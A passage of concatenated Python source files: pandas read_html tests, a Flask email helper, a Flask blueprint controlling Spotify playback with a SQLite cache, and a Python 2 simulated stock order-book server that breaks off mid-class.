gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
expected = DataFrame(
[["a", "b"]],
columns=MultiIndex.from_tuples(
[("Unnamed: 0_level_0", "A"), ("Unnamed: 1_level_0", "B")]
),
)
tm.assert_frame_equal(result[0], expected)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
@pytest.mark.filterwarnings(
"ignore:You provided Unicode markup but also provided a value for "
"from_encoding.*:UserWarning"
)
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
def __iter__(self):
# to fool `is_file_like`, should never end up here
assert False
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from api.app import mail
def send_async_email(app, to, subject, template, **kwargs):
    """Render and send one email inside *app*'s context (worker-thread body).

    ``template`` is a base name; the ``.txt`` and ``.html`` variants are
    rendered with **kwargs for the plain and rich bodies respectively.
    """
    with app.app_context():  # pragma: no cover
        message = Message(subject, recipients=[to])
        message.body = render_template(template + '.txt', **kwargs)
        message.html = render_template(template + '.html', **kwargs)
        mail.send(message)
def send_email(to, subject, template, **kwargs):  # pragma: no cover
    """Send an email on a background thread and return the started Thread."""
    # The real app object (not the proxy) must cross the thread boundary so
    # the worker can push its own application context.
    app = current_app._get_current_object()
    worker = Thread(
        target=send_async_email,
        args=(app, to, subject, template),
        kwargs=kwargs,
    )
    worker.start()
    return worker
|
spotify.py | #!/usr/bin/env python
from app import lego
from app import webhook
from flask import Blueprint, request, render_template, \
flash, g, session, redirect, url_for, \
current_app
from urllib.request import urlopen
import io
import logging
import os
import sqlite3
import tekore as tk
import threading
logger = logging.getLogger(__name__)
spotify = Blueprint('spotify', __name__)
# NOTE(review): these current_app lookups require an active application
# context at import time -- this module must be imported from within one.
VERSION = current_app.config['VERSION']
conf = (current_app.config['CLIENT_ID'],
        current_app.config['CLIENT_SECRET'],
        current_app.config['REDIRECT_URI']
        )
cred = tk.Credentials(*conf)
tkspotify = tk.Spotify()
# Token store: Spotify user id -> tekore token (refreshed by user_token()).
users = {}
current_dir = os.path.dirname(os.path.abspath(__file__))
# Serialises SQLite cursor use across threads (see nowplaying()).
cache_lock = threading.Lock()
def init_cache():
    """Use a database to store song meta data to reduce API calls.
    """
    # Published as module globals because nowplaying()/resume()/spotcast()
    # use the connection and cursor directly rather than receiving them.
    global connection
    global cursor
    cache_dir = current_dir + '/.cache'
    os.makedirs(cache_dir, exist_ok=True)
    # check_same_thread=False: the web workers and the lego thread may all
    # touch this connection; cache_lock guards nowplaying()'s cursor use --
    # NOTE(review): other call sites appear unguarded, confirm thread-safety.
    connection = sqlite3.connect(cache_dir + '/songs.db', check_same_thread=False)
    cursor = connection.cursor()
    cursor.execute("create table if not exists song \
                    (id text, \
                    image_url text, \
                    artist text, \
                    name text, \
                    duration integer)")
def connectLego():
    """Start the LEGO controller (lego.Base) on a background thread."""
    threading.Thread(target=lego.Base).start()
# Import-time side effects: open the song cache and start the LEGO thread.
init_cache()
connectLego()
def activated():
    """Return True once a Spotify user has completed the OAuth callback.

    Relies on the module-global ``user`` being bound by main()/spotcast():
    an unbound name (NameError) means nobody has logged in yet.
    """
    try:
        user
    except NameError:
        # Point the operator at the login URL (REDIRECT_URI minus 'callback').
        logger.error('Spotify not activated. Visit %s' % conf[2].replace('callback',''))
        return False
    else:
        return True
def pause():
    """Pause Spotify playback for the logged-in user (best effort)."""
    # Empty client id -> Spotify integration disabled; nothing to do.
    if conf[0] == '':
        return
    # Global ``user`` is only bound after login; unbound means not logged in.
    try:
        user
    except NameError:
        return
    if user_token(user) is None:
        logger.error('No Spotify token found.')
        return ''
    with tkspotify.token_as(users[user]):
        try:
            tkspotify.playback_pause()
        except Exception:
            # Deliberate best-effort: e.g. no active device / nothing playing.
            pass
def resume():
    """Resume playback and return the current track's remaining time in ms.

    Returns early sentinels on failure paths (None when disabled, 0 when not
    logged in, '' when no token); falls back to 60000 ms when the remaining
    time cannot be computed from the cache.
    """
    if conf[0] == '':
        return
    try:
        user
    except NameError:
        return 0
    if user_token(user) is None:
        logger.error('No Spotify token found.')
        return ''
    # Default: assume a minute remains if the lookup below fails.
    sp_remaining = 60000
    with tkspotify.token_as(users[user]):
        try:
            tkspotify.playback_resume()
            song = tkspotify.playback_currently_playing()
            sp_elapsed = song.progress_ms
            sp_id = song.item.id
            # Track duration comes from the local cache, avoiding an API call.
            cursor.execute("""select duration from song where id = ?;""", (sp_id,))
            row = cursor.fetchone()
            sp_remaining = row[0] - sp_elapsed
        except Exception:
            # Best effort -- keep the 60000 ms fallback on any failure.
            pass
    return sp_remaining
def spotcast(spotify_uri,position_ms=0):
    """Play a track, playlist or album on Spotify.
    """
    # Returns the track duration in ms on success, 60000 as a fallback when
    # metadata is unavailable, 0 when Spotify is disabled/not activated, and
    # -1 when the playback call itself fails.
    global users
    global user
    if conf[0] == '':
        return 0
    try:
        user
    except NameError:
        logger.warn('Spotify not activated. Please visit: URL')
        return 0
    if user_token(user) is None:
        logger.error('No Spotify token found.')
        return 0
    # spotify_uri looks like 'track:<id>' or '<context>:<id>'.
    uri = spotify_uri.split(':')
    with tkspotify.token_as(users[user]):
        try:
            if uri[0] == 'track':
                tkspotify.playback_start_tracks([uri[1]],position_ms=position_ms)
            else:
                tkspotify.playback_start_context('spotify:' + spotify_uri,position_ms=position_ms)
        except Exception as e:
            logger.error("Could not cast to Spotify.")
            logger.error(e)
            return -1
        try:
            cursor.execute("""select * from song where id = ?;""", (uri[1],))
            row = cursor.fetchone()
        except Exception as e:
            logger.error(e)
            row = None
            # Cache unavailable: fall back to a one-minute duration.
            return 60000
        if row is None:
            # Cache miss: duration unknown, use the one-minute fallback.
            return 60000
        # Cached columns are (id, image_url, artist, name, duration).
        artist = row[2]
        name = row[3]
        duration_ms = row[4]
        logger.info('Playing %s.' % name)
        return duration_ms
    # NOTE(review): every path through the ``with`` block above returns, so
    # this line appears unreachable -- confirm against the original layout.
    return 0
@spotify.route('/', methods=['GET'])
def main():
    """Landing page: redirect to /login until a session user exists.

    Side effect: publishes the session user to the module-global ``user``
    consumed by pause()/resume()/spotcast()/nowplaying().
    """
    global user
    user = session.get('user', None)
    # ``is None`` (identity) rather than ``== None`` -- PEP 8 idiom and safe
    # against objects with custom __eq__.
    if user is None:
        # Auto login
        return redirect('/login', 307)
    return render_template("index.html", user=user)
@spotify.route('/login', methods=['GET'])
def login():
    """Log in: local pseudo-user when no client id is set, else Spotify OAuth."""
    if conf[0] == '':
        # No credentials configured -- bypass OAuth with a local session.
        session['user'] = 'local'
        return redirect('/', 307)
    authorisation_url = cred.user_authorisation_url(scope=tk.scope.every)
    return redirect(authorisation_url, 307)
@spotify.route('/callback', methods=['GET'])
def login_callback():
    """OAuth redirect target: exchange the code for a token and store it."""
    global users
    code = request.args.get('code', None)
    token = cred.request_user_token(code)
    # Identify the account the token belongs to so it can be keyed by id.
    with tkspotify.token_as(token):
        info = tkspotify.current_user()
    session['user'] = info.id
    # user_token() later refreshes this entry in place when it expires.
    users[info.id] = token
    logger.info('Spotify activated.')
    return redirect('/', 307)
def user_token(user):
    """Return a valid access token for *user* from the token store.

    Returns None for the pseudo-user 'local' and for a missing user.
    A token that is about to expire is refreshed and stored back first.
    """
    if user == 'local' or user is None:
        return None
    token = users[user]
    if token.is_expiring:
        users[user] = cred.refresh(token)
    return users[user]
@spotify.route('/nowplaying')
def nowplaying():
    """Render the now-playing page (album art, artist, title) for the
    currently playing Spotify track, using a local SQLite cache keyed by
    track id to avoid repeated metadata lookups.
    """
    # `user` is a module global; any failure here means "nothing to show".
    try:
        if user_token(user) is None:
            return ''
    except Exception:
        return ''
    with tkspotify.token_as(users[user]):
        try:
            song = tkspotify.playback_currently_playing()
        except Exception as e:
            logger.error('Spotify could not find any track playing: %s' % e)
            return render_template('nowplaying.html')
        # Nothing playing: render the template without track data.
        if (song is None) or (not song.is_playing):
            return render_template('nowplaying.html')
        # The cache_lock avoids the "recursive use of cursors not allowed" exception.
        try:
            cache_lock.acquire(True)
            cursor.execute("""select * from song where id = ?;""", (song.item.id,))
        except Exception as e:
            logger.error("Could not query cache database: %s" % e)
            return render_template('nowplaying.html')
        finally:
            cache_lock.release()
        # NOTE(review): fetchone() runs after the lock is released — confirm
        # this is safe with concurrent requests sharing `cursor`.
        row = cursor.fetchone()
        if row is None:
            # Cache miss: fetch full metadata from Spotify and store it.
            track = tkspotify.track(song.item.id)
            images_url = track.album.images
            image_url = images_url[0].url
            name = track.name
            duration_ms = track.duration_ms
            artists = ''
            for item in track.artists:
                artists += item.name + ', '
            # Trim the trailing ", " of the joined artist names.
            artist = artists[:-2]
            cursor.execute("""insert into song values (?,?,?,?,?);""",
                           (song.item.id,image_url,artist,name,duration_ms))
            connection.commit()
        else:
            # Cache hit: columns are (id, image_url, artist, name, duration_ms).
            song.item.id = row[0]
            image_url = row[1]
            artist = row[2]
            name = row[3]
            duration_ms = row[4]
    return render_template("nowplaying.html",
                           image_url=image_url,
                           artist=artist,
                           name=name)
|
server.py | ################################################################################
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from itertools import izip
from random import normalvariate, random
from datetime import timedelta, datetime
import csv
import dateutil.parser
import os.path
import operator
import json
import re
import threading
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from SocketServer import ThreadingMixIn
################################################################################
#
# Config
# Sim params
REALTIME = True           # pace App's book generators against wall-clock time
SIM_LENGTH = timedelta(days = 365 * 5)   # total simulated history to generate
MARKET_OPEN = datetime.today().replace(hour = 0, minute = 30, second = 0)
# Market parms
# min / max / std — bounded-random-walk parameters fed to bwalk()
SPD = (2.0, 6.0, 0.1)     # spread
PX = (60.0, 150.0, 1)     # price
FREQ = (12, 36, 50)       # hours advanced between ticks in market()
# Trades
OVERLAP = 4               # divisor for the order-price std-dev in orders()
################################################################################
#
# Test Data
def bwalk(min, max, std):
    """Yield an endless random walk bounded to the interval [min, max].

    Each step perturbs the level by a normal variate with the given std;
    the modulo/abs fold keeps the reflected value inside the range.
    """
    span = max - min
    level = max
    while True:
        level += normalvariate(0, std)
        yield abs((level % (span * 2)) - span) + min
def market(t0 = MARKET_OPEN):
    """Generate an endless random series of market conditions as
    (time, price, spread) tuples, advancing the clock by a random
    number of hours per tick.
    """
    # izip keeps this lazy on Python 2 — eager zip() would never return
    # on these infinite generators.
    for hours, px, spd in izip(bwalk(*FREQ), bwalk(*PX), bwalk(*SPD)):
        yield t0, px, spd
        t0 += timedelta(hours = abs(hours))
def orders(hist):
    """Generate random limit orders (time, stock, side, price, size) from a
    series of (time, price, spread) market conditions.
    """
    for t, px, spd in hist:
        # Coin-flip the stock first, then the side — RNG call order matters
        # for reproducibility under a fixed seed.
        if random() > 0.5:
            stock = 'ABC'
        else:
            stock = 'DEF'
        if random() > 0.5:
            side, d = 'sell', 2
        else:
            side, d = 'buy', -2
        price = round(normalvariate(px + (spd / d), spd / OVERLAP), 2)
        qty = int(abs(normalvariate(0, 100)))
        yield t, stock, side, price, qty
################################################################################
#
# Order Book
def add_book(book, order, size, _age = 10):
    """Yield a book with (order, size) on top at age _age, ageing every
    existing level by one and dropping levels whose age has reached zero.
    """
    yield order, size, _age
    for prev_order, prev_size, prev_age in book:
        if prev_age > 0:
            yield prev_order, prev_size, prev_age - 1
def clear_order(order, size, book, op = operator.ge, _notional = 0):
    """ Try to clear a sized order against a book, returning a tuple of
    (notional, new_book) if successful, and None if not. _notional is a
    recursive accumulator and should not be provided by the caller.
    """
    top_order, top_size, age = book[0]
    tail = book[1:]
    if not op(order, top_order):
        return None
    _notional += min(size, top_size) * top_order
    leftover = top_size - size
    if leftover > 0:
        # Top level only partially consumed: push the remainder back on.
        return _notional, list(add_book(tail, top_order, leftover, age))
    if tail:
        # Top level fully consumed: keep clearing the residual size deeper.
        return clear_order(order, -leftover, tail, op, _notional)
    # NOTE(review): exact consumption with an empty tail also yields None,
    # which callers treat as "no clear" — preserved from the original.
    return None
def clear_book(buy = None, sell = None):
    """ Clears all crossed orders from a buy and sell book, returning the new
    books uncrossed.
    """
    while buy and sell:
        top_price, top_size, _ = buy[0]
        cleared = clear_order(top_price, top_size, sell)
        if not cleared:
            break
        # Top buy fully cleared: drop it and continue with the reduced sells.
        sell = cleared[1]
        buy = buy[1:]
    return buy, sell
def order_book(orders, book, stock_name):
    """Generate a series of (time, bids, asks) book states from a series of
    orders, tracking only *stock_name*. `book` maps side -> list of
    (price, size, age) levels and is mutated in place, so mutating a
    yielded book affects the next turn!
    """
    for t, stock, side, order, size in orders:
        if stock_name == stock:
            new = add_book(book.get(side, []), order, size)
            # Buys sort descending (best bid first), sells ascending.
            book[side] = sorted(new, reverse = side == 'buy', key = lambda x: x[0])
        # Uncross and emit a state for every incoming order, even for the
        # other stock's orders.
        bids, asks = clear_book(**book)
        yield t, bids, asks
################################################################################
#
# Test Data Persistence
def generate_csv():
    """ Generate a CSV of simulated order history into test.csv. """
    # 'wb' is the correct csv open mode under Python 2 (this file is
    # Python 2 throughout: print statements, iteritems, xrange).
    with open('test.csv', 'wb') as f:
        writer = csv.writer(f)
        for t, stock, side, order, size in orders(market()):
            # Stop once the simulated clock passes the configured horizon.
            if t > MARKET_OPEN + SIM_LENGTH:
                break
            writer.writerow([t, stock, side, order, size])
def read_csv():
    """ Lazily read the order history back out of test.csv, yielding
    (datetime, stock, side, price, size) tuples.
    """
    with open('test.csv', 'rb') as f:
        for time, stock, side, order, size in csv.reader(f):
            yield dateutil.parser.parse(time), stock, side, float(order), int(size)
################################################################################
#
# Server
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """ Boilerplate class for a multithreaded HTTP Server, with working
    shutdown.
    """
    # Allow quick restarts on the same port (SO_REUSEADDR).
    allow_reuse_address = True
    def shutdown(self):
        """ Override MRO to shutdown properly. """
        # Close the listening socket before the base-class shutdown runs.
        self.socket.close()
        HTTPServer.shutdown(self)
def route(path):
    """Decorator that tags a handler with the path pattern it serves.

    The dispatcher later regex-matches request paths against the stored
    ``__route__`` attribute and passes parsed query params to the handler.
    """
    def attach(handler):
        handler.__route__ = path
        return handler
    return attach
def read_params(path):
    """ Read query parameters into a dictionary if they are parseable,
    otherwise returns None.
    """
    parts = path.split('?')
    if len(parts) > 1:
        pairs = parts[1].split('&')
        # Split on the first '=' only, so values containing '=' (URLs,
        # base64, ...) survive instead of raising ValueError in dict().
        return dict(pair.split('=', 1) for pair in pairs)
    return None
def get(req_handler, routes):
    """ Map a request to the appropriate route of a routes instance. """
    # Scan the routes object's class dict for methods tagged by @route and
    # dispatch to one whose route regex matches the request path.
    for name, handler in routes.__class__.__dict__.iteritems():
        if hasattr(handler, "__route__"):
            if None != re.search(handler.__route__, req_handler.path):
                req_handler.send_response(200)
                req_handler.send_header('Content-Type', 'application/json')
                req_handler.send_header('Access-Control-Allow-Origin', '*')
                req_handler.end_headers()
                # Parsed query params (or None) are passed to the handler.
                params = read_params(req_handler.path)
                data = json.dumps(handler(routes, params)) + '\n'
                req_handler.wfile.write(data)
                return
    # NOTE(review): no response is written when no route matches — the
    # client hangs until timeout; confirm whether a 404 is wanted.
def run(routes, host = '0.0.0.0', port = 8080):
""" Runs a class as a server whose methods have been decorated with
@route.
"""
class RequestHandler(BaseHTTPRequestHandler):
def log_message(self, *args, **kwargs):
pass
def do_GET(self):
get(self, routes)
server = ThreadedHTTPServer((host, port), RequestHandler)
thread = threading.Thread(target = server.serve_forever)
thread.daemon = True
thread.start()
print 'HTTP server started on port 8080'
while True:
from time import sleep
sleep(1)
server.shutdown()
server.start()
server.waitForThread()
################################################################################
#
# App
# NOTE(review): appears unused in this chunk; presumably maps an order side
# to its price-comparison operator (cf. clear_order's `op` parameter) —
# confirm against the rest of the file before removing.
ops = {
    'buy': operator.le,
    'sell': operator.ge,
}
class App(object):
    """ The trading game server application. """
    def __init__(self):
        # One mutable order book (and its generator of book states) per stock.
        self._book_1 = dict()
        self._book_2 = dict()
        self._data_1 = order_book(read_csv(), self._book_1, 'ABC')
        self._data_2 = order_book(read_csv(), self._book_2, 'DEF')
        # Anchor wall-clock to simulated time for REALTIME pacing.
        self._rt_start = datetime.now()
        self._sim_start, _, _ = self._data_1.next()
        self.read_10_first_lines()
    @property
    def _current_book_1(self):
        # Each property access creates a fresh generator that continues from
        # the current position of the underlying _data_1 stream. In REALTIME
        # mode it re-yields the same state while simulated time is still
        # ahead of elapsed wall-clock time.
        for t, bids, asks in self._data_1:
            if REALTIME:
                while t > self._sim_start + (datetime.now() - self._rt_start):
                    yield t, bids, asks
